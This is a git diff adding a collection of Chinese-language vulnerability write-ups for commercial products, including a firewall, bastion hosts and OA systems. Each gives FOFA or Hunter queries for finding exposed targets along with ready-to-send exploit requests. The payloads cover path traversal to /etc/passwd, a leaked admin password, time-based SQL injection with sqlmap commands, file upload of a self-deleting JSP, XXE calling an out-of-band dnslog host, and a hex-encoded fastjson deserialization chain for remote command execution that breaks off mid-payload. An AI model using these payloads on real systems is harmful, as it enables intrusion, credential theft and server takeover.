+中科网威-防火墙控制系统是一款由中科网威有限公司开发的网络安全产品，它是基于软件的网络防火墙解决方案，为企业提供了完整的网络安全保障，漏洞点位于：download.php  由于开发人员未对该文件做鉴权，导致恶意攻击者可未授权访读取任意文件。
+
+# 二、影响版本
++ 中科网威下一代防火墙控制系统
+
+# 三、资产测绘
+```plain
+fofa：body="Get_Verify_Info(hex_md5(user_string)."
+```
+
+![1716105114884-70a33e88-bcbd-4a6e-875c-dbbbf08ca27f.png](./img/9XBQdpMPoIfBB4EZ/1716105114884-70a33e88-bcbd-4a6e-875c-dbbbf08ca27f-151998.png)
+
+# 四、漏洞复现
+```plain
+GET /download.php?&class=vpn&toolname=../../../../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Connection: close
+
+```
+
+![1716105138745-69a8dbc8-b354-4d9a-a1a3-ef939ec89748.png](./img/9XBQdpMPoIfBB4EZ/1716105138745-69a8dbc8-b354-4d9a-a1a3-ef939ec89748-656214.png)
+
+
+
+> 更新: 2024-05-23 12:38:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qcctbq425bs1ghp6>
\ No newline at end of file
diff --git a/中科网威下一代防火墙控制系统存在账号密码泄露漏洞.md b/中科网威下一代防火墙控制系统存在账号密码泄露漏洞.md
new file mode 100644
index 0000000..afe7080
--- /dev/null
+++ b/中科网威下一代防火墙控制系统存在账号密码泄露漏洞.md
@@ -0,0 +1,30 @@
+# 中科网威下一代防火墙控制系统存在账号密码泄露漏洞
+
+# 一、漏洞简介
+中科网威-防火墙控制系统是一款由中科网威有限公司开发的网络安全产品，它是基于软件的网络防火墙解决方案，为企业提供了完整的网络安全保障，中科网威下一代防火墙控制系统存在账号密码泄露漏洞
+
+# 二、影响版本
++ 中科网威下一代防火墙控制系统
+
+# 三、资产测绘
+```plain
+fofa：body="Get_Verify_Info(hex_md5(user_string)."
+```
+
+![1716105114884-70a33e88-bcbd-4a6e-875c-dbbbf08ca27f.png](./img/7dCscLIt1QBXtVRG/1716105114884-70a33e88-bcbd-4a6e-875c-dbbbf08ca27f-313987.png)
+
+# 四、漏洞复现
+F12查看源代码，搜索password
+
+![1716105318958-6be10303-3ee1-4139-af93-3006d6736a25.png](./img/7dCscLIt1QBXtVRG/1716105318958-6be10303-3ee1-4139-af93-3006d6736a25-042739.png)
+
+![1716105348512-7132b86e-ac43-4087-8bac-bbdee2546b9c.png](./img/7dCscLIt1QBXtVRG/1716105348512-7132b86e-ac43-4087-8bac-bbdee2546b9c-047370.png)
+
+admin/fsdwjsmask登录成功
+
+![1716105426647-da43aba0-28b1-41a9-bd71-e25db00f7b5c.png](./img/7dCscLIt1QBXtVRG/1716105426647-da43aba0-28b1-41a9-bd71-e25db00f7b5c-919779.png)
+
+
+
+> 更新: 2024-05-23 12:38:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bbox678nu2innxae>
\ No newline at end of file
diff --git a/中远麒麟堡垒机admin_commonuserSQL注入漏洞.md b/中远麒麟堡垒机admin_commonuserSQL注入漏洞.md
new file mode 100644
index 0000000..dc74681
--- /dev/null
+++ b/中远麒麟堡垒机admin_commonuserSQL注入漏洞.md
@@ -0,0 +1,50 @@
+# 中远麒麟堡垒机admin_commonuserSQL注入漏洞
+
+# 一、漏洞简介
+中远麒麟依托自身强大的研发能力,丰富的行业经验，自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控，消除了传统运维过程中的盲区，实现了运维简单化、操作可控化、过程可视化，是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。
+
+# 二、影响版本
++ 中远麒麟堡垒机
+
+# 三、资产测绘
++ fofa`cert.subject="Baolei"`
++ 登录页面
+
+![1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d.png](./img/4GELrA0FZ4l8bMSI/1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d-959746.png)
+
+# 四、漏洞复现
+```plain
+POST /admin.php?controller=admin_commonuser HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=66b53a13d3db0e27a9676d419c374c42
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 78
+
+username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
+```
+
+![1694188860909-0dd921d8-b119-4ff4-a1df-dc376091c62c.png](./img/4GELrA0FZ4l8bMSI/1694188860909-0dd921d8-b119-4ff4-a1df-dc376091c62c-177575.png)
+
+**sqlmap**
+
+```plain
+sqlmap -u 'https://xx.xx.xx.xx/admin.php?controller=admin_commonuser' --data='username=admin'  --batch
+```
+
+![1694189009300-0c3496b5-ebbb-4327-849d-e3225a9e9c6f.png](./img/4GELrA0FZ4l8bMSI/1694189009300-0c3496b5-ebbb-4327-849d-e3225a9e9c6f-940166.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/br57cs51cd4m7sr5>
\ No newline at end of file
diff --git a/中远麒麟堡垒机tokensSQL注入漏洞.md b/中远麒麟堡垒机tokensSQL注入漏洞.md
new file mode 100644
index 0000000..e09b1a2
--- /dev/null
+++ b/中远麒麟堡垒机tokensSQL注入漏洞.md
@@ -0,0 +1,50 @@
+# 中远麒麟堡垒机tokensSQL注入漏洞
+
+# 一、漏洞简介
+中远麒麟依托自身强大的研发能力,丰富的行业经验，自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控，消除了传统运维过程中的盲区，实现了运维简单化、操作可控化、过程可视化，是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。
+
+# 二、影响版本
++ 中远麒麟堡垒机
+
+# 三、资产测绘
++ fofa`cert.subject="Baolei"`
++ 登录页面
+
+![1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d.png](./img/nE4g5ODj8_AVhbV_/1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d-879476.png)
+
+# 四、漏洞复现
+```plain
+POST /baoleiji/api/tokens HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=66b53a13d3db0e27a9676d419c374c42
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+
+constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1
+```
+
+![1694189196630-fb35bd59-a136-40d9-933c-3169624d44d8.png](./img/nE4g5ODj8_AVhbV_/1694189196630-fb35bd59-a136-40d9-933c-3169624d44d8-112577.png)
+
+**sqlmap**
+
+```plain
+sqlmap -u 'https://xx.xx.xx.xx/baoleiji/api/tokens' --data='constr=1&title=%40127.0.0.1'
+```
+
+![1694189648421-30ea9bf7-e73f-4b80-8f5e-764869f2c14a.png](./img/nE4g5ODj8_AVhbV_/1694189648421-30ea9bf7-e73f-4b80-8f5e-764869f2c14a-633219.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hc0u6hawuz8n4lam>
\ No newline at end of file
diff --git a/乐享智能运维管理平台getToken存在SQL注入漏洞.md b/乐享智能运维管理平台getToken存在SQL注入漏洞.md
new file mode 100644
index 0000000..3810f55
--- /dev/null
+++ b/乐享智能运维管理平台getToken存在SQL注入漏洞.md
@@ -0,0 +1,18 @@
+# 乐享智能运维管理平台getToken存在SQL注入漏洞
+
+乐享智能运维管理平台getToken存在SQL注入漏洞
+
+## hunter
+
+```yaml
+title="乐享智能运维管理平台"
+```
+
+## poc
+
+```java
+POST /auth-ui/v1/api/user/token/getToken HTTP/1.1
+
+account=admin');SELECT PG_SLEEP(5)--&password=6e0f9e14344c5406a0cf5a3b4dfb665f87f4a771a31f7edbb5c72874a32b2957
+```
+
diff --git a/九块九付费进群系统wxselect存在SQL注入漏洞.md b/九块九付费进群系统wxselect存在SQL注入漏洞.md
new file mode 100644
index 0000000..24cb8a7
--- /dev/null
+++ b/九块九付费进群系统wxselect存在SQL注入漏洞.md
@@ -0,0 +1,45 @@
+# 九块九付费进群系统wxselect存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(47, 48, 52);">九块九付费进群系统是一种新的社群管理方式，用户通过支付9.9元人民币即可加入特定的微信群，享受群内提供的服务或资源。这种模式通常用于知识分享、资源下载、专业交流等社群，通过设置门槛来筛选成员，提高群组的专业性和互动质量。</font>
+
+# 二、影响版本
++ 九块九付费进群系统
+
+# 三、资产测绘
++ fofa`body="/website/index/login.html"`
++ 特征
+
+![1727023333396-3a7f6804-9a8f-4e9c-bc92-025420191364.png](./img/dKPKVxkRHevpbLyx/1727023333396-3a7f6804-9a8f-4e9c-bc92-025420191364-061163.png)
+
+# 四、漏洞复现
+```go
+POST /group/index/wxselect HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+ 
+orderid=') AND GTID_SUBSET(CONCAT((MID((IFNULL(CAST(VERSION() AS NCHAR),0x7e)),1,190))),5417)-- ylIU
+```
+
+![1727023353581-462c7f1d-7f5f-4154-995c-eb4145dc950c.png](./img/dKPKVxkRHevpbLyx/1727023353581-462c7f1d-7f5f-4154-995c-eb4145dc950c-570829.png)
+
+```go
+POST /group/index/wxselect HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+ 
+orderid=1
+```
+
+
+
+> 更新: 2024-10-22 09:36:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bdvfpxsyrd03yo6q>
\ No newline at end of file
diff --git a/九垠赢商业管理系统Common.ashx存在文件上传漏洞.md b/九垠赢商业管理系统Common.ashx存在文件上传漏洞.md
new file mode 100644
index 0000000..b3cf60a
--- /dev/null
+++ b/九垠赢商业管理系统Common.ashx存在文件上传漏洞.md
@@ -0,0 +1,37 @@
+# 九垠赢商业管理系统Common.ashx存在文件上传漏洞
+成都和力九垠科技有限公司成立于1999年，是一家专业从事零售业全流程解决方案的高科技公司，总部位于四川成都。多年来，九垠软件不忘初衷，一直致力于中国零售企业的成长与发展，为广大客户提供优秀的零售商业管理软件与优质的金牌售后服务。经过多年的积累与发展，九垠科技已成为中国零售企业管理信息化的领导品牌。
+
+九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+```rust
+"九垠赢"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735477150841-8d8d1019-2950-4949-bd1c-b1d1e3d704f8.png)
+
+## poc
+```rust
+POST /System/Common.ashx?type=savefile&path=test.aspx HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6
+
+--WebKitFormBoundaryHHaZAYecVOf5sfa6
+Content-Disposition: form-data; name="content";
+Content-Type: text/plain
+
+testupload
+--WebKitFormBoundaryHHaZAYecVOf5sfa6--
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735567254760-73f40ebe-e194-443c-ae77-0eba4097f52e.png)
+
+上传位置
+
+```plain
+/System/test.aspx
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735567239364-47dda596-ade7-40ed-89a9-80e60eac5a14.png)
+
diff --git a/九思OA接口WebServiceProxy存在XXE漏洞.md b/九思OA接口WebServiceProxy存在XXE漏洞.md
new file mode 100644
index 0000000..20d5896
--- /dev/null
+++ b/九思OA接口WebServiceProxy存在XXE漏洞.md
@@ -0,0 +1,25 @@
+# 九思OA接口WebServiceProxy存在XXE漏洞
+
+九思OA接口isoaNebServiceProxy 存在XML实体注入漏洞，未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据。
+
+## fofa
+
+```yaml
+body="/jsoa/login.jsp"
+```
+
+## poc
+
+```java
+POST /jsoa/WebServiceProxy HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://11111.edbxqa.dnslog.cn"> %remote;]>
+```
+
diff --git a/九思OA接口dl.jsp任意文件读取漏洞.md b/九思OA接口dl.jsp任意文件读取漏洞.md
new file mode 100644
index 0000000..1cac986
--- /dev/null
+++ b/九思OA接口dl.jsp任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# 九思OA接口dl.jsp任意文件读取漏洞
+
+北京九思协同办公软件dl.jsp接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="/jsoa/login.jsp"
+```
+
+## poc
+
+```javascript
+POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+Connection: close
+```
+
+![image-20241114140239709](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141402862.png)
\ No newline at end of file
diff --git a/九思OA系统upload_l.jsp存在任意文件上传漏洞.md b/九思OA系统upload_l.jsp存在任意文件上传漏洞.md
new file mode 100644
index 0000000..6de99c1
--- /dev/null
+++ b/九思OA系统upload_l.jsp存在任意文件上传漏洞.md
@@ -0,0 +1,32 @@
+# 九思OA系统upload_l.jsp存在任意文件上传漏洞
+
+九思OA系统upload_l.jsp存在任意文件上传漏洞
+
+## fofa
+
+```javascript
+body="/jsoa/webmail/ajax_util.js"
+```
+
+## poc
+
+```javascript
+POST /jsoa/wpsforlinux/src/upload_l.jsp?openType=1&flowflag=1&userName=1&recordId=1 HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
+Content-Length: 102
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Upgrade-Insecure-Requests: 1
+filename: /../../tologin.jsp
+
+<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+```
+
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062221004.png)
+
+文件路径：
+
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062222216.png)
\ No newline at end of file
diff --git a/九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入.md b/九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入.md
new file mode 100644
index 0000000..b8430f2
--- /dev/null
+++ b/九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入.md
@@ -0,0 +1,32 @@
+# 九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入
+
+北京九思协同办公软件 `/jsoa/workflow/dwr/exec/workflowSync.getUserStatusByRole.dwr`接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```javascript
+app="九思软件-OA"
+```
+
+## poc
+
+```javascript
+POST /jsoa/workflow/dwr/exec/workflowSync.getUserStatusByRole.dwr HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
+callCount=1
+c0-scriptName=workflowSync
+c0-methodName=getUserStatusByRole
+c0-id=1
+c0-param0=string:1
+c0-param1=string:1 union select 0,sleep(5)#
+xml=true
+```
+
+![image-20241128095426150](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280954210.png)
\ No newline at end of file
diff --git a/云安宝-云匣子config存在fastjson远程代码执行漏洞.md b/云安宝-云匣子config存在fastjson远程代码执行漏洞.md
new file mode 100644
index 0000000..cff14f9
--- /dev/null
+++ b/云安宝-云匣子config存在fastjson远程代码执行漏洞.md
@@ -0,0 +1,37 @@
+# 云安宝-云匣子 config 存在fastjson远程代码执行漏洞
+
+# 一、漏洞简介
+云安宝-云匣子是租户连接云资源的安全管理工具，帮助云租户更加安全、精细的管理云上的虚拟机、数据库等资源。 该系统config接口存在fastjson 漏洞可执行任意系统命令。
+
+# 二、影响版本
++ 云安宝·云匣子
+
+# 三、资产测绘
++ hunter`app.name="云安宝·云匣子"`
++ 特征![1701857196082-46640013-6f01-4e5b-be68-f8b67997f715.png](./img/aQRss8sqMlqj0mF0/1701857196082-46640013-6f01-4e5b-be68-f8b67997f715-617840.png)
+
+# 四、漏洞复现
+<font style="color:rgb(51, 51, 51);">请求包中的 Referer 不能删，服务端会检测该字段，需要改为对应的Hostname，可修改cmd为系统命令，获取执行结果</font>
+
+```java
+POST /3.0/authService/config HTTP/2
+Host: xx.xx.xx.xx
+Accept: application/json, text/plain, */*
+Content-Type: application/json;charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36
+Referer: https://xx.xx.xx.xx
+Cmd: whoami
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Priority: u=1, i
+Content-Length: 18907
+
+{"a":{"@type":"java.lang.Class","val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"b":{"@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200206a617661782e7363726970742e536372697074456e67696e654d616e61676572000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000b6e6577496e7374616e6365757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007371007e00137571007e0018000000017400026a7374000f676574456e67696e6542794e616d657571007e001b00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00180000000174202b747279207b0a20206c6f616428226e6173686f726e3a6d6f7a696c6c615f636f6d7061742e6a7322293b0a7d20636174636820286529207b7d0a66756e6374696f6e20676574556e7361666528297b0a202076617220746865556e736166654d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e556e7361666522292e6765744465636c617265644669656c642827746865556e7361666527293b0a2020746865556e736166654d6574686f642e73657441636365737369626c652874727565293b200a202072657475726e20746865556e736166654d6574686f642e676574286e756c6c293b0a7d0a66756e6374696f6e2072656d6f7665436c617373436163686528636c617a7a297b0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617a7a416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c61737328636c617a7a2c6a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c61737322292e6765745265736f75726365417353747265616d2822436c6173732e636c61737322292e72656164416c6c427974657328292c6e756c6c293b0a2020766172207265666c656374696f6e446174614669656c64203d20636c617a7a416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428227265666c656374696f6e4461746122293b0a2020756e736166652e7075744f626a65637428636c617a7a2c756e736166652e6f626a6563744669656c644f6666736574287265666c656374696f6e446174614669656c64292c6e756c6c293b0a7d0a66756e6374696f6e206279706173735265666c656374696f6e46696c7465722829207b0a2020766172207265666c656374696f6e436c6173733b0a2020747279207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a646b2e696e7465726e616c2e7265666c6563742e5265666c656374696f6e22293b0a20207d20636174636820286572726f7229207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e7265666c6563742e5265666c656374696f6e22293b0a20207d0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617373427566666572203d207265666c656374696f6e436c6173732e6765745265736f75726365417353747265616d28225265666c656374696f6e2e636c61737322292e72656164416c6c427974657328293b0a2020766172207265666c656374696f6e416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c617373287265666c656374696f6e436c6173732c20636c6173734275666665722c206e756c6c293b0a2020766172206669656c6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226669656c6446696c7465724d617022293b0a2020766172206d6574686f6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226d6574686f6446696c7465724d617022293b0a2020696620286669656c6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286669656c6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a2020696620286d6574686f6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286d6574686f6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a202072656d6f7665436c6173734361636865286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173732229293b0a7d0a66756e6374696f6e2073657441636365737369626c652861636365737369626c654f626a656374297b0a2020202076617220756e73616665203d20676574556e7361666528293b0a20202020766172206f766572726964654669656c64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e7265666c6563742e41636365737369626c654f626a65637422292e6765744465636c617265644669656c6428226f7665727269646522293b0a20202020766172206f6666736574203d20756e736166652e6f626a6563744669656c644f6666736574286f766572726964654669656c64293b0a20202020756e736166652e707574426f6f6c65616e2861636365737369626c654f626a6563742c206f66667365742c2074727565293b0a7d0a66756e6374696f6e20646566696e65436c617373286279746573297b0a202076617220636c7a203d206e756c6c3b0a20207661722076657273696f6e203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226a6176612e76657273696f6e22293b0a202076617220756e73616665203d20676574556e7361666528290a202076617220636c6173734c6f61646572203d206e6577206a6176612e6e65742e55524c436c6173734c6f61646572286a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6e65742e55524c22292c203029293b0a20207472797b0a202020206966202876657273696f6e2e73706c697428222e22295b305d203e3d20313129207b0a2020202020206279706173735265666c656374696f6e46696c74657228293b0a20202020646566696e65436c6173734d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173734c6f6164657222292e6765744465636c617265644d6574686f642822646566696e65436c617373222c206a6176612e6c616e672e436c6173732e666f724e616d6528225b4222292c6a6176612e6c616e672e496e74656765722e545950452c206a6176612e6c616e672e496e74656765722e54595045293b0a2020202073657441636365737369626c6528646566696e65436c6173734d6574686f64293b0a202020202f2f20e7bb95e8bf872073657441636365737369626c65200a20202020636c7a203d20646566696e65436c6173734d6574686f642e696e766f6b6528636c6173734c6f616465722c2062797465732c20302c2062797465732e6c656e677468293b0a202020207d656c73657b0a2020202020207661722070726f74656374696f6e446f6d61696e203d206e6577206a6176612e73656375726974792e50726f74656374696f6e446f6d61696e286e6577206a6176612e73656375726974792e436f6465536f75726365286e756c6c2c206a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e73656375726974792e636572742e436572746966696361746522292c203029292c206e756c6c2c20636c6173734c6f616465722c205b5d293b0a202020202020636c7a203d20756e736166652e646566696e65436c617373286e756c6c2c2062797465732c20302c2062797465732e6c656e6774682c20636c6173734c6f616465722c2070726f74656374696f6e446f6d61696e293b0a202020207d0a20207d6361746368286572726f72297b0a202020206572726f722e7072696e74537461636b547261636528293b0a20207d66696e616c6c797b0a2020202072657475726e20636c7a3b0a20207d0a7d0a66756e6374696f6e206261736536344465636f6465546f427974652873747229207b0a20207661722062743b0a20207472797b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e4241534536344465636f64657222292e6e6577496e7374616e636528292e6465636f646542756666657228737472293b0a20207d63617463682865297b7d0a2020696620286274203d3d206e756c6c297b0a202020207472797b0a2020202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e42617365363422292e6e6577496e7374616e636528292e6765744465636f64657228292e6465636f646528737472293b0a202020207d63617